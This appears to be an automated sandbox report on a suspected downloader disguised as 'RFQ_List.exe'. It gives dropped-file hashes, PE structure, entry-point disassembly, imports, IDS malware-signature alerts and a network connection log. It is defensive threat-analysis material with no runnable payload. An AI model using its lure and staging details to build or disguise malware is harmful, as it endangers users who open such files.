                SSDEEP:768:NNxZ+39Fm6bVPJacZnq1T2m6o9dla/C1Y5xxD1w/o2ROgMK7vOqj8zumcicsqXxQ:NmE6R3zvZAhiZq+Nm6pLVawSgc8Cke2
                MD5:7B99EB8E7148F8C420E09FB360215B97
                SHA1:0D6B5053DAC5CA692217DBE9B0800316CC0E5C42
                SHA-256:84FBD7F281D8B3631200E264351545FA1DC2C256367B83A2CD0EBEB2E1A884B2
                SHA-512:B09C75B1271086763AB863FB8A755B688E48CA46A97550A651125217C27B9801EE2ED6DE65F912FCE3793E3FBF24063857F81F1473EB21ED76267A435C0AF57B
                Malicious:false
                Preview:.......n...........................................................^.........................P.................................J........................................................................*...............E........................................H...................0.............................2..........................................7..................................................-......................................................A................................................................................}..........v......v..........3..........6..................i..........|...................$.............h............'.........................y...W.9.....................8.....................................................................6...................X.....................................................6................o....................................................y......[.........b.........................p..................................
                Process:C:\Users\user\Desktop\RFQ_List.exe
                File Type:data
                Category:dropped
                Size (bytes):283523
                Entropy (8bit):1.2517647181496547
                Encrypted:false
                SSDEEP:768:Vp4oNJKrnvbCN/KeYxLJF9VPGsNo8E2FPOd9gkdLGcY3M/C+KLtbEEmDi4YxK8JY:U3nVkUc/9T+47K8
                MD5:1EAEC618F4CEE65603DBC98CC4ACFFD5
                SHA1:7C57A1E9E3E8A87CDAC4279C9CD1F48921AFD3E5
                SHA-256:BAFBD7BA6E116FA4621416AFFA402B5E77BD3EC8A1CD6883B86B2500ED32236F
                SHA-512:4892B80B2F1F3ECC2E3940928F7220B601057B1CB6EADFB2EDDAB1B330966663627C1AE87B3D8C47576A5861422C7906E297C4F11FC18A1DC332559B74B24389
                Malicious:false
                Preview:..............5.................A.....................................M..............................V...........................~..................................................... .......=...6..............................n......l.............w........P....................F..+............-..............w.........1............H......|.................@..........E..........................................................`......]....................]..........................G...........w...........................o...................../.......................................................a..............V........................................................................w.k................................../............................................J....................p.....................................l..........o....................a.........................RS........................,..S...............l.................................................L.H..............
                Process:C:\Users\user\Desktop\RFQ_List.exe
                File Type:data
                Category:dropped
                Size (bytes):226967
                Entropy (8bit):1.2523842479629557
                Encrypted:false
                SSDEEP:768:3AGAEvmWSP+6MQhb59DUem6F2X8dzV+Z8+r0aFk7yShqxG9m6VA2fALEOoWU4/yz:rcteBv2Xmd6
                MD5:5E418394A6BDD607FD99936B606B16B6
                SHA1:AA66F3F103B9E6026D17726DE083834957022433
                SHA-256:503C8736545D2B5612D84243FC79FDEAB9DA98ACF6E936D18E5755236EDF79B5
                SHA-512:184528AC2000AE86037E954C3A0CFA45EDD4E0789A4F940F9AC5C6750EFA416BF71FB8533FF3F14C3C746F329FA4B29F998F8080F4D904168A2A175005D04BDD
                Malicious:false
                Preview:.........................._..;...........................].....................................................B............e...m...........(....U.......................................W............................................N.............................................................................................8..............................................................................................R.........$.....'................*.i.........................................*...........................b......#............n.............................;p.......g..........X..:.e.............................N........b.0...........P.............s..............................................................................................V......1.............................x............................J....H................X..............)...........................................Q.........................................F..........}.%..................................
                Process:C:\Users\user\Desktop\RFQ_List.exe
                File Type:data
                Category:dropped
                Size (bytes):351531
                Entropy (8bit):1.255004735349448
                Encrypted:false
                SSDEEP:768:vtnDa/EP5kFIQ50d2qgSXrNKj6kg7pqCdYWGcZHmfxNLVMdLTmzCfYCt08fLGL84:B969AOqGVMp9iFwBzg7gnwf
                MD5:4C4AE3CA611575271974D70E3165CA94
                SHA1:B645FF20978B7B3F88F590851CE0ED3E22B9DF03
                SHA-256:CC86D299F6A01B3278E6ABD5DA639588B0B7FBF0043A6BADFEF3DA29320DC762
                SHA-512:F39F08DB7527B8190407B4D4209201261E7C91531CB8CF1BB03EA3AAD86AA913CBEA6B28629F1C5BD69FF51E1BF7A11F4E9393E41FE44062199E2B875BE83FCA
                Malicious:false
                Preview:........................................................................................................................................................A........P.............................~.......................................l.............4............................................1...............s..............K.......m.......................................................;.......z.............s.................K.................-........................T......3.........6............................................U.....:.......~................................l......................=...../.....D...2..........3...p.......................P..................................m......................b..l................K...................................`.........../.....W................#.................!......................................................}...,........@...............g...C..................P..................................(...........6....................W.
                Process:C:\Users\user\Desktop\RFQ_List.exe
                File Type:dBase IV DBT, block length 2560, next free block index 21, next free block 0, next used block 0
                Category:dropped
                Size (bytes):252461
                Entropy (8bit):1.2493375868406968
                Encrypted:false
                SSDEEP:768:AykHXFrLko/QFYJsdiqVC2S0lkhrBqTu1zfsknvSZ4os5np88nXHosXKHUGR0QrH:GH1/yDPtU0S+kg4n0m6Xzp/1HDaIP
                MD5:010EE4F1EE9C180B89D1C3E930374CBA
                SHA1:BF2033E8D13926314B9EA776AA3FB95B72D6E118
                SHA-256:9F10777AE5FE6CBB11DDDAAC3F5DD7A7F46D7B27D8D1C78BAD1286DDA9602518
                SHA-512:ABEC8E837435B7086D71C13E923D30B095A6411DE7D4B3C1984754896F8993EF93F68B700D034A35E9D8ABEDF48FF33FDC9F02B2B55027042B8F27A602DE774A
                Malicious:false
                Preview:..............?...................D.......\.&..........................N...............................{.....................................G................................o.......(..........|................................D..............X.......................................................h....................................................................................................0..........g..B........../...................................................................................................)......................................................t.............a..........z...........g......................t...............I...S.............................................~....4.................................................x..................................................................................=.J...................................................................................e............................4.........M................................
                Process:C:\Users\user\Desktop\RFQ_List.exe
                File Type:data
                Category:dropped
                Size (bytes):332313
                Entropy (8bit):1.2524630814549833
                Encrypted:false
                SSDEEP:1536:yaaIh+D2s7piRwb32b8giA7tquM42GdILYfRs/:ODj/VRDGyG
                MD5:9344CE0FFA5CDEE95A7D4ACB69316358
                SHA1:5F11CB1D4489ECE30229257AD648225BE9E27E1A
                SHA-256:F11224BF4988F3E5365402ADACDBEDC70D0732B35F7284E1D1C9076D09076D43
                SHA-512:943C8EE246D047AE8A0D3BA472FF991983502C678EF942269D87CEECBFFBE39011F0ADBAE209BB961D93B0C5A3254B2D2556B68FC794946E830AE66E867E598E
                Malicious:false
                Preview:............................SA1...............................".............................f............u.0..............................................C.......<..]...................................f..........................|.........................................&.....i.......................3.......F....................................................................'...........O..............].............................P..........................................................................................................................................................................................u..........................s......................_...............#............n...$..............x..j......r...........|...._...............................................V.f...._...................s..........................................R.................................................W...........................n....................................I....................
                Process:C:\Users\user\Desktop\RFQ_List.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):353
                Entropy (8bit):4.211689964548391
                Encrypted:false
                SSDEEP:6:KhOMxEWb6aDKp8Wwoi/fAutuGIlKtXZsm1CLMQIbpW4mLWwPx2jJ:ADuakwDvEr2ZsQEnwwPx2jJ
                MD5:C1C6D8511B3FBE94F744DF9BA827D18D
                SHA1:B3EFA90BE122251E4267FDDB7BB6ADCCFDDDC958
                SHA-256:A54B603B2BEE75BCF8A30C6C4634C3DFA78B512739D0D5FAE84FF2262686E0A8
                SHA-512:C9D1A502B259B93B11850CC8901F15D19F591CE67B0E8268E414A332A5A7C50667F7FB41526C5265EE7735D77F6D3C160C0DE29B84FF87250CAC6D611E1D46CC
                Malicious:false
                Preview:chollers lynett fimreceller opklodset hexagrams carrier mandorla mumblebee..ugudelighedernes ennoblements kluntemikkelen dekretere.hierarchized testosteronet vandrefuglens paasknnelsers eneboerskernes jumping,aflush argosies pinds nonelementary calciner,nul efficacies samkvemsretten isuridae driftsomkostningerne,espier subauriculate skospnders dorere,
                Process:C:\Users\user\Desktop\RFQ_List.exe
                File Type:data
                Category:dropped
                Size (bytes):328191
                Entropy (8bit):7.651306886535396
                Encrypted:false
                SSDEEP:6144:WMLMwjW47RsLO+ms0jD4jKLBrEDgzwB4/Tyf2D8XIJlGv2:NLRW4i6+p0H4OiDgzwC/TekGIvGO
                MD5:489A9469B8457A7DAD8C174D89221366
                SHA1:52DA5892B83416D9328EEC4A15B5C217EE08C1F0
                SHA-256:B150F922D2266E7E99C0FC7E5AA565BECC5671DAEA479980B741ADC1D99B2BE2
                SHA-512:C788BF86225C25DF3C4020012D38A68CF107BFEB18B7C43ADF20E2969C9CF35BD2E959DD8C67337DFED2FB677ECB749E6D9634F0B5CAA548F10971C4295E2473
                Malicious:false
                Preview:....;...................:...,,,...............pp.(.................b.NN.....kkkk........;......C.............d........q.G....+...............f...hh...~..............z......A.......``.......QQQQQ.r.s..........u...........HHH............nn............B.........LL..........0000.................;;;;.......<<.8.....WW..LLL...........33........''.uuu.)).......~...........................kk..KK.X.......33...........................c...hhhh.......................p..O.'............tt.....l...JJ............................u.k.!.~~~~...00........(.II.........................................=..www......n..........0.......~...........NN.///.........}...gg....^...........................xx....44...................]]]]]..............m.............._...............^^....y........--.[............oo...................hhh.WWW.g........................................####...................g......ii............v.........................yy.................{{...>>>>....]]].......,,,.........................
                Process:C:\Users\user\Desktop\RFQ_List.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):32
                Entropy (8bit):3.8431390622295662
                Encrypted:false
                SSDEEP:3:TLCJR1EHX0Ctyn:TLA1MUn
                MD5:53898E643BD3E0CA22A462325AD62DA4
                SHA1:E0F08A75FA5219F39E49C1B9F361119905DA7D02
                SHA-256:B947991000AEA669EBFEADFB12DE45121D46AD3DFD02296F373F9BF8CE4F1AFF
                SHA-512:AA17B99A93A04F7BBBB92F34C15921DA80E20592A39B3921F1D3CC59FAE55F66196B2BE4F56716846DAFF041253CB63D7E373B84234D451181C87F1D097FE8CA
                Malicious:false
                Preview:[sprnglrd]..allis=tarsadenitis..
                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                Entropy (8bit):7.8603182914839635
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:RFQ_List.exe
                File size:927'736 bytes
                MD5:27393ac93e0c60c934afa5ccdfc7c529
                SHA1:e1989ce514efd53819be62e8aa4c51975da0b3e0
                SHA256:66f7ca7287b5118119d8e6b8d55222d7662da16c12345a6122a28b64702ae69b
                SHA512:672583e3937f3f5f5e84843913da032d5f6d6d32c759758e37710dff340973f9f0c77fb8f5b7b176b26edddec5851aa4902deb103b277b7403ea57d88292b438
                SSDEEP:24576:dbusrIDaWLwBhB9XE/2D6lm7Pytae6/B1GX:SX8zB9XQ2gm7OjGB1GX
                TLSH:01152361E398C867DC6116B28827D86968F6FC6985B14D4F332F3719EA33302653F94B
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..NP..*_...P...s...P...V...P..Rich.P..........................PE..L......V.................d.........
                Icon Hash:1130233367c3e313
                Entrypoint:0x4032a0
                Entrypoint Section:.text
                Digitally signed:true
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Time Stamp:0x567F847F [Sun Dec 27 06:26:07 2015 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:d4b94e8ee3f620a89d114b9da4b31873
                Signature Valid:false
                Signature Issuer:CN=Recriticises, O=Recriticises, L=Soldier, C=US
                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                Error Number:-2146762487
                Not Before, Not After
                • 07/03/2024 01:40:39 07/03/2027 01:40:39
                Subject Chain
                • CN=Recriticises, O=Recriticises, L=Soldier, C=US
                Version:3
                Thumbprint MD5:98573B9330068AEDB04ECFF4E202481E
                Thumbprint SHA-1:17DA9433FF10A2B2720362F4E40834A52FED9116
                Thumbprint SHA-256:8450E43FAC09732749132875E06A5977249235647F6E53C9A39369145577AD71
                Serial:1C8996D9F8EF526438F303839B42156814F40758
                Instruction
                sub esp, 000002D4h
                push ebp
                push esi
                push 00000020h
                xor ebp, ebp
                pop esi
                mov dword ptr [esp+0Ch], ebp
                push 00008001h
                mov dword ptr [esp+0Ch], 0040A300h
                mov dword ptr [esp+18h], ebp
                call dword ptr [004080B0h]
                call dword ptr [004080ACh]
                cmp ax, 00000006h
                je 00007F6F58E7A3D3h
                push ebp
                call 00007F6F58E7D516h
                cmp eax, ebp
                je 00007F6F58E7A3C9h
                push 00000C00h
                call eax
                push ebx
                push edi
                push 0040A2F4h
                call 00007F6F58E7D493h
                push 0040A2ECh
                call 00007F6F58E7D489h
                push 0040A2E0h
                call 00007F6F58E7D47Fh
                push 00000009h
                call 00007F6F58E7D4E4h
                push 00000007h
                call 00007F6F58E7D4DDh
                mov dword ptr [00434F04h], eax
                call dword ptr [00408044h]
                push ebp
                call dword ptr [004082A8h]
                mov dword ptr [00434FB8h], eax
                push ebp
                lea eax, dword ptr [esp+34h]
                push 000002B4h
                push eax
                push ebp
                push 0042B228h
                call dword ptr [0040818Ch]
                push 0040A2C8h
                push 00433F00h
                call 00007F6F58E7D0CAh
                call dword ptr [004080A8h]
                mov ebx, 0043F000h
                push eax
                push ebx
                call 00007F6F58E7D0B8h
                push ebp
                call dword ptr [00408178h]
                Programming Language:
                • [EXP] VC++ 6.0 SP5 build 8804
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x85c80xa0.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x710000x1e308.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0xe1ef00x908
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b8.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x637c0x640083ff228d6dae8dd738eb2f78afbc793fFalse0.672421875data6.491609540807675IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata0x80000x147c0x1600d9f9b0b330e238260616b62a7a3cac09False0.42933238636363635data4.973928345594701IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0xa0000x2aff80x6003f2b05c8fbb8b2e4c9c89e93d30e7252False0.53125data4.133631086111171IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .ndata0x350000x3c0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc0x710000x1e3080x1e40024942564d8bf1d8e057f4addfed688e9False0.4605258910123967data6.06487438837818IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                NameRVASizeTypeLanguageCountryZLIB Complexity
                RT_BITMAP0x713580x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                RT_ICON0x716c00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.20474979297290902
                RT_ICON0x81ee80x864fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9821423377832068
                RT_ICON0x8a5380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.366804979253112
                RT_ICON0x8cae00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4129924953095685
                RT_ICON0x8db880x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5221311475409836
                RT_ICON0x8e5100x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.598404255319149
                RT_DIALOG0x8e9780x144dataEnglishUnited States0.5216049382716049
                RT_DIALOG0x8eac00x13cdataEnglishUnited States0.5506329113924051
                RT_DIALOG0x8ec000x120dataEnglishUnited States0.5138888888888888
                RT_DIALOG0x8ed200x11cdataEnglishUnited States0.6091549295774648
                RT_DIALOG0x8ee400xc4dataEnglishUnited States0.5918367346938775
                RT_DIALOG0x8ef080x60dataEnglishUnited States0.7291666666666666
                RT_GROUP_ICON0x8ef680x5adataEnglishUnited States0.7888888888888889
                RT_MANIFEST0x8efc80x33fXML 1.0 document, ASCII text, with very long lines (831), with no line terminatorsEnglishUnited States0.5547533092659447
                DLLImport
                KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GlobalUnlock, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States
                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                2024-10-28T06:47:14.901287+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.451907142.250.185.206443TCP
                2024-10-28T06:47:20.831783+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.451943158.101.44.24280TCP
                2024-10-28T06:47:22.066174+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.451943158.101.44.24280TCP
                2024-10-28T06:47:23.845919+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.451960188.114.97.3443TCP
                2024-10-28T06:47:24.496127+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.451966158.101.44.24280TCP
                2024-10-28T06:47:32.234588+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.452015188.114.97.3443TCP
                TimestampSource PortDest PortSource IPDest IP
                Oct 28, 2024 06:47:13.589226961 CET51907443192.168.2.4142.250.185.206
                Oct 28, 2024 06:47:13.589307070 CET44351907142.250.185.206192.168.2.4
                Oct 28, 2024 06:47:13.589523077 CET51907443192.168.2.4142.250.185.206
                Oct 28, 2024 06:47:13.604381084 CET51907443192.168.2.4142.250.185.206
                Oct 28, 2024 06:47:13.604418993 CET44351907142.250.185.206192.168.2.4
                Oct 28, 2024 06:47:14.481179953 CET44351907142.250.185.206192.168.2.4
                Oct 28, 2024 06:47:14.481271982 CET51907443192.168.2.4142.250.185.206
                Oct 28, 2024 06:47:14.482253075 CET44351907142.250.185.206192.168.2.4
                Oct 28, 2024 06:47:14.482321978 CET51907443192.168.2.4142.250.185.206
                Oct 28, 2024 06:47:14.533207893 CET51907443192.168.2.4142.250.185.206
                Oct 28, 2024 06:47:14.533258915 CET44351907142.250.185.206192.168.2.4
                Oct 28, 2024 06:47:14.534138918 CET44351907142.250.185.206192.168.2.4
                Oct 28, 2024 06:47:14.535890102 CET51907443192.168.2.4142.250.185.206
                Oct 28, 2024 06:47:14.539028883 CET51907443192.168.2.4142.250.185.206
                Oct 28, 2024 06:47:14.579339027 CET44351907142.250.185.206192.168.2.4
                Oct 28, 2024 06:47:14.901321888 CET44351907142.250.185.206192.168.2.4
                Oct 28, 2024 06:47:14.901388884 CET51907443192.168.2.4142.250.185.206
                Oct 28, 2024 06:47:14.901416063 CET44351907142.250.185.206192.168.2.4
                Oct 28, 2024 06:47:14.901463032 CET51907443192.168.2.4142.250.185.206
                Oct 28, 2024 06:47:14.901608944 CET51907443192.168.2.4142.250.185.206
                Oct 28, 2024 06:47:14.901695967 CET44351907142.250.185.206192.168.2.4
                Oct 28, 2024 06:47:14.901767969 CET51907443192.168.2.4142.250.185.206
                Oct 28, 2024 06:47:14.936290979 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:14.936371088 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:14.936459064 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:14.936691046 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:14.936727047 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:16.121784925 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:16.121887922 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:16.128745079 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:16.128791094 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:16.129159927 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:16.129223108 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:16.129894972 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:16.171361923 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:18.926270962 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:18.926371098 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:18.934382915 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:18.934439898 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.042498112 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.042563915 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.042593002 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.042665958 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.042850971 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.042900085 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.042953968 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.043000937 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.045691967 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.045741081 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.045763016 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.045818090 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.050034046 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.050081968 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.050096035 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.050146103 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.058743954 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.058796883 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.058809996 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.058856010 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.067560911 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.067614079 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.067627907 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.067679882 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.076644897 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.076694965 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.076751947 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.076800108 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.085191965 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.085248947 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.085280895 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.085326910 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.093818903 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.093883991 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.093930960 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.093977928 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.159643888 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.159713984 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.159832001 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.159894943 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.159946918 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.160016060 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.160628080 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.160692930 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.160718918 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.160769939 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.160821915 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.160875082 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.161487103 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.161537886 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.161607027 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.161657095 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.162785053 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.162842989 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.162955999 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.163012028 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.163069963 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.163126945 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.167074919 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.167150021 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.167300940 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.167370081 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.167413950 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.167470932 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.167546034 CET44351917172.217.16.193192.168.2.4
